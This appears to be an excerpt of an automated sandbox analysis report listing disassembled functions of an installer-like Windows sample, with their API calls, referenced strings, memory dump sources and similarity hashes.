                                                                                                                                                              • Failed to update name and publisher., xrefs: 007D077B
                                                                                                                                                              • Failed to update resume mode., xrefs: 007D0762
                                                                                                                                                              • Failed to open registration key., xrefs: 007D0748
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpen
                                                                                                                                                              • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                                                                                                                              • API String ID: 47109696-1865096027
                                                                                                                                                              • Opcode ID: 479009bdadaf52501e2c07d46f025dd079de51e090662a69ded29810c6e831be
                                                                                                                                                              • Instruction ID: d3311b5e616b1c2194da25f8a4e4014291ceafc6fa050f13b17c8cd87f80a9d0
                                                                                                                                                              • Opcode Fuzzy Hash: 479009bdadaf52501e2c07d46f025dd079de51e090662a69ded29810c6e831be
                                                                                                                                                              • Instruction Fuzzy Hash: AA015232A40628F7CF525694DC46BEEBA79EF10B30F100156F910AA250D779AE50AAD5
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(0080B500,40000000,00000001,00000000,00000002,00000080,00000000,007D04BF,00000000,?,007CF4F4,?,00000080,0080B500,00000000), ref: 00804DCB
                                                                                                                                                              • GetLastError.KERNEL32(?,007CF4F4,?,00000080,0080B500,00000000,?,007D04BF,?,00000094,?,?,?,?,?,00000000), ref: 00804DD8
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,007CF4F4,?,007CF4F4,?,00000080,0080B500,00000000,?,007D04BF,?,00000094), ref: 00804E2C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 2528220319-2967768451
                                                                                                                                                              • Opcode ID: f163a9017106fa0e43ace21482aad15a1d4ee562aff6cc9bcc10041f86bb3e53
                                                                                                                                                              • Instruction ID: 03bae6041440c3c57c04770f44aae92ef896f86d17fac0444a86235af5df9993
                                                                                                                                                              • Opcode Fuzzy Hash: f163a9017106fa0e43ace21482aad15a1d4ee562aff6cc9bcc10041f86bb3e53
                                                                                                                                                              • Instruction Fuzzy Hash: 0301BC73681525ABD6725A699C0AF5B3A54FB41B71F025210FF20EA2E0E7608C1192E0
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,007E8C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 008049AE
                                                                                                                                                              • GetLastError.KERNEL32(?,007E8C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 008049BB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorFileLast
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 1214770103-2967768451
                                                                                                                                                              • Opcode ID: 6699401207f3d0874e8ae392d13d136200e9b7d92722b9fe83dfe5427bddbd71
                                                                                                                                                              • Instruction ID: a072c2546d615d66c3e2c5aec88116243ce33cb66fc2391ada671dbbab50abe9
                                                                                                                                                              • Opcode Fuzzy Hash: 6699401207f3d0874e8ae392d13d136200e9b7d92722b9fe83dfe5427bddbd71
                                                                                                                                                              • Instruction Fuzzy Hash: F301D6736C1535F7E37126956C0AF6B2E58FB01B70F114225FF51EA2E0DB695D1092E0
                                                                                                                                                              APIs
                                                                                                                                                              • ControlService.ADVAPI32(007E6AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,007E6AFD,00000000), ref: 007E6C13
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,007E6AFD,00000000), ref: 007E6C1D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ControlErrorLastService
                                                                                                                                                              • String ID: Failed to stop wusa service.$msuengine.cpp
                                                                                                                                                              • API String ID: 4114567744-2259829683
                                                                                                                                                              • Opcode ID: 8056e72ebba04c097cc5a626ab82f1fdab0b925d81b2b25c3e230500b2750b38
                                                                                                                                                              • Instruction ID: 73791c3ad9f07c03c0520d6d480f44c0cd4d00d6f72513eb9d7ded6290dd8cbc
                                                                                                                                                              • Opcode Fuzzy Hash: 8056e72ebba04c097cc5a626ab82f1fdab0b925d81b2b25c3e230500b2750b38
                                                                                                                                                              • Instruction Fuzzy Hash: 9D01FC73A41238A7D7209B659C05BAB77A4FF08760F114029FD00EB280DA289C0145E4
                                                                                                                                                              APIs
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 008039F4
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00803A27
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                              • String ID: `<u$xmlutil.cpp
                                                                                                                                                              • API String ID: 344208780-3482516102
                                                                                                                                                              • Opcode ID: 86b5e368490d30bb8d781f3b4d91db8e46fa19f8c930dccf87333753a98726ac
                                                                                                                                                              • Instruction ID: 99b51c3fc1f973270bcdfaa23fcd62e77878190efc72f10eb2066923f9495280
                                                                                                                                                              • Opcode Fuzzy Hash: 86b5e368490d30bb8d781f3b4d91db8e46fa19f8c930dccf87333753a98726ac
                                                                                                                                                              • Instruction Fuzzy Hash: FD01A235744225BBD7605A999C09F6B36DCFF42B64F110529FC44E7380D6B8CE0086A0
                                                                                                                                                              APIs
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 0080396E
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008039A1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                              • String ID: `<u$xmlutil.cpp
                                                                                                                                                              • API String ID: 344208780-3482516102
                                                                                                                                                              • Opcode ID: c7ec314dcc2c2a8bb2e89ddaf3f0e9e53509391779570b37265b8a23a57c4f2c
                                                                                                                                                              • Instruction ID: 19881f407190167532738f39a92f643f6172d5f1426adf873f8a83787f5a393d
                                                                                                                                                              • Opcode Fuzzy Hash: c7ec314dcc2c2a8bb2e89ddaf3f0e9e53509391779570b37265b8a23a57c4f2c
                                                                                                                                                              • Instruction Fuzzy Hash: 1101D631645219ABD7601A989C09F7B3BDCFF42B64F114539FD40E7380C6B4CE0096E1
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0080690F
                                                                                                                                                                • Part of subcall function 00808713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00808820
                                                                                                                                                                • Part of subcall function 00808713: GetLastError.KERNEL32 ref: 0080882A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$ErrorFileFreeLastStringSystem
                                                                                                                                                              • String ID: `<u$atomutil.cpp$clbcatq.dll
                                                                                                                                                              • API String ID: 211557998-1658759192
                                                                                                                                                              • Opcode ID: 369b3660737f63ed5a04fce3aa676af6d5a09ae0b31f0c8f49fc44fd3e103778
                                                                                                                                                              • Instruction ID: 7ac44c1708a644ac22b0cb4f5d76a3d343bf916a213f90eb46c330788a5fee45
                                                                                                                                                              • Opcode Fuzzy Hash: 369b3660737f63ed5a04fce3aa676af6d5a09ae0b31f0c8f49fc44fd3e103778
                                                                                                                                                              • Instruction Fuzzy Hash: 10014FB190122AFFCB609F89DC4186AFBA8FB14765B61817AE504EB650E3715E30D6D0
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 007DECED
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DECF7
                                                                                                                                                              Strings
                                                                                                                                                              • EngineForApplication.cpp, xrefs: 007DED1B
                                                                                                                                                              • Failed to post elevate message., xrefs: 007DED25
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessagePostThread
                                                                                                                                                              • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                                                                                                                              • API String ID: 2609174426-4098423239
                                                                                                                                                              • Opcode ID: 5c643419fbf7340f9700238fb90286827d3f7940bf1ae07f5da9041ba8e8af3c
                                                                                                                                                              • Instruction ID: 62691cc9ed26631ec3c614843f8952de9e651f73d0dee544d4f5137747e29f03
                                                                                                                                                              • Opcode Fuzzy Hash: 5c643419fbf7340f9700238fb90286827d3f7940bf1ae07f5da9041ba8e8af3c
                                                                                                                                                              • Instruction Fuzzy Hash: D2F0FC33740231ABC73166989C09F8677A4BF00B70B214129FE14EF3C1DB29CC0186D4
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 007CD903
                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,007C48D7,00000000,?,?,007C548E,?,?), ref: 007CD912
                                                                                                                                                              • GetLastError.KERNEL32(?,007C48D7,00000000,?,?,007C548E,?,?), ref: 007CD91C
                                                                                                                                                              Strings
                                                                                                                                                              • BootstrapperApplicationDestroy, xrefs: 007CD8FB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                              • String ID: BootstrapperApplicationDestroy
                                                                                                                                                              • API String ID: 1144718084-3186005537
                                                                                                                                                              • Opcode ID: 3d2edd6f5415265325e48f5044547eb7408ae1de8db2ab23472e3d0ae28d496b
                                                                                                                                                              • Instruction ID: 43b5df81566f54b9ebbd5c70a3f1ca197cdc187497f321b3b0bf70558e649e75
                                                                                                                                                              • Opcode Fuzzy Hash: 3d2edd6f5415265325e48f5044547eb7408ae1de8db2ab23472e3d0ae28d496b
                                                                                                                                                              • Instruction Fuzzy Hash: E6F06236700A26ABC3304F6AD804F2AF7A8FF14B62B01823DE825D6520D775FC508BD0
                                                                                                                                                              APIs
                                                                                                                                                              • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,fT|,?,00000000,007C5466,?,?,?), ref: 00803DA7
                                                                                                                                                              • CoCreateInstance.OLE32(00000000,00000000,00000001,0082716C,?), ref: 00803DBF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFromInstanceProg
• String ID: Microsoft.Update.AutoUpdate$fT|
• API String ID: 2151042543-1826053810
• Opcode ID: 8b1c9970854aa26cfa14a569d033e04352b90e0179d563fe974291c0c54c1300
• Instruction ID: ea9e32965db420bb846812f6dddf999e2fe73bc5de00d55714d21d95b4cecdeb
• Opcode Fuzzy Hash: 8b1c9970854aa26cfa14a569d033e04352b90e0179d563fe974291c0c54c1300
• Instruction Fuzzy Hash: EDF03A71611219BBDB10EFA9ED05AAFB7BCEB09710F510065EA01E7290D671AE0486A2
APIs
• SysAllocString.OLEAUT32(?), ref: 00803200
• SysFreeString.OLEAUT32(00000000), ref: 00803230
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: String$AllocFree
• String ID: `<u$xmlutil.cpp
• API String ID: 344208780-3482516102
• Opcode ID: b8f17a5528b2f825cba01da95a6120d5efe0926fe93ca1e3d3a0967845e73178
• Instruction ID: 9dbee1599c32ca551afb9efde072c644851388909a196970eddc19866a6e6769
• Opcode Fuzzy Hash: b8f17a5528b2f825cba01da95a6120d5efe0926fe93ca1e3d3a0967845e73178
• Instruction Fuzzy Hash: E8F0BE32102668EBC7310F84AC09F6B77ECFB80B62F258029FC04AB350C7758E1096E0
APIs
• SysAllocString.OLEAUT32(?), ref: 008034AD
• SysFreeString.OLEAUT32(00000000), ref: 008034DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: String$AllocFree
• String ID: `<u$xmlutil.cpp
• API String ID: 344208780-3482516102
• Opcode ID: cfa9b8d12e22214b0de78ab19a0257202e3b0e3b29a75cf1f61b9d7c2f99075c
• Instruction ID: 881cc776e2b3f4123cb221384eecb38dc26d9d0a9586e0b2c27b37a456375fff
• Opcode Fuzzy Hash: cfa9b8d12e22214b0de78ab19a0257202e3b0e3b29a75cf1f61b9d7c2f99075c
• Instruction Fuzzy Hash: B8F0B435241618EBC7731E44AC08E5B77ACFB52B60F21411AFC04DB350C775DE5096E4
APIs
• PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 007DF2EE
• GetLastError.KERNEL32 ref: 007DF2F8
Strings
• EngineForApplication.cpp, xrefs: 007DF31C
• Failed to post plan message., xrefs: 007DF326
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLastMessagePostThread
• String ID: EngineForApplication.cpp$Failed to post plan message.
• API String ID: 2609174426-2952114608
• Opcode ID: 7cb309da2f403b986feeeada1cb3be965484a31c366fdc71b1d24ff733b11ed8
• Instruction ID: 15f2113f03197ba4e5105cf8d7e0b3a619d7cefeb73856c367cb663be8a1fada
• Opcode Fuzzy Hash: 7cb309da2f403b986feeeada1cb3be965484a31c366fdc71b1d24ff733b11ed8
• Instruction Fuzzy Hash: 40F0A7336416316BD6312A95AC0AE8B7FD8FF04B70B024025FD54EB391D669DC0085E5
APIs
• PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 007DF3FC
• GetLastError.KERNEL32 ref: 007DF406
Strings
• EngineForApplication.cpp, xrefs: 007DF42A
• Failed to post shutdown message., xrefs: 007DF434
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLastMessagePostThread
• String ID: EngineForApplication.cpp$Failed to post shutdown message.
• API String ID: 2609174426-188808143
• Opcode ID: c42d218928711e2500d4c12eda2ff99563ea6af7d27b9fd19b918f4b06cd42a0
• Instruction ID: c3e4b46983ebfc7b16d7d27e3655981487aa8548c1d7257066f6611025ab2aed
• Opcode Fuzzy Hash: c42d218928711e2500d4c12eda2ff99563ea6af7d27b9fd19b918f4b06cd42a0
• Instruction Fuzzy Hash: B2F03737A4163577D6315695AC0EF877BA8FF04B60B124036FE14FB392E659DC0086E5
APIs
• SetEvent.KERNEL32(0080B478,00000000,?,007E1717,?,00000000,?,007CC287,?,007C5405,?,007D75A5,?,?,007C5405,?), ref: 007E07BF
• GetLastError.KERNEL32(?,007E1717,?,00000000,?,007CC287,?,007C5405,?,007D75A5,?,?,007C5405,?,007C5445,00000001), ref: 007E07C9
Strings
• Failed to set begin operation event., xrefs: 007E07F7
• cabextract.cpp, xrefs: 007E07ED
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorEventLast
• String ID: Failed to set begin operation event.$cabextract.cpp
• API String ID: 3848097054-4159625223
• Opcode ID: 959ce6e4eab3f04477043943611345e7ad76ffe6e85efec6fdba8984aa0dc088
• Instruction ID: f0f40fcde6456739278b2dc595f7489dd45424a50c74e429067aa845e8577210
• Opcode Fuzzy Hash: 959ce6e4eab3f04477043943611345e7ad76ffe6e85efec6fdba8984aa0dc088
• Instruction Fuzzy Hash: C8F0EC3754367167D62112965D0AB8F77C8FF09B71B114129FE01FB340E66CAC80C6E5
APIs
• PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 007DEBE0
• GetLastError.KERNEL32 ref: 007DEBEA
Strings
• Failed to post apply message., xrefs: 007DEC18
• EngineForApplication.cpp, xrefs: 007DEC0E
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLastMessagePostThread
• String ID: EngineForApplication.cpp$Failed to post apply message.
• API String ID: 2609174426-1304321051
• Opcode ID: 69b23863bd931c7aef08c0a0e7e42fd6023211d1dc7d0cb4a14b5c04c4d05160
• Instruction ID: ed2fee91d6b2790bd5df6d268765e4706e6b4e25ed298d9483845c1353904199
• Opcode Fuzzy Hash: 69b23863bd931c7aef08c0a0e7e42fd6023211d1dc7d0cb4a14b5c04c4d05160
• Instruction Fuzzy Hash: D5F01233A5163567D63226959C0DE8BBE98FF04B70B024015FE18FE391D669980096E5
APIs
• PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 007DEC71
• GetLastError.KERNEL32 ref: 007DEC7B
Strings
• EngineForApplication.cpp, xrefs: 007DEC9F
• Failed to post detect message., xrefs: 007DECA9
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLastMessagePostThread
• String ID: EngineForApplication.cpp$Failed to post detect message.
• API String ID: 2609174426-598219917
• Opcode ID: 4b04f5fba4bf0bd649ce880878990ea1ac45e79fe3c2b3c5d7b682d81c4de3a0
• Instruction ID: 10296f5455e623de4ae0d99c11f3e3bc38a482daad0f6f414629232a49708b5e
• Opcode Fuzzy Hash: 4b04f5fba4bf0bd649ce880878990ea1ac45e79fe3c2b3c5d7b682d81c4de3a0
• Instruction Fuzzy Hash: 89F0A73365123167D6316695AC09F877FA8FF04B71B124015BD5CEE381E669DC00C5E4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                              • Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                                                                                                                              • Instruction ID: c55b02849e01bff947777c3dbf2d23cad13df3c29a829d6b68f46228a84e743b
                                                                                                                                                              • Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
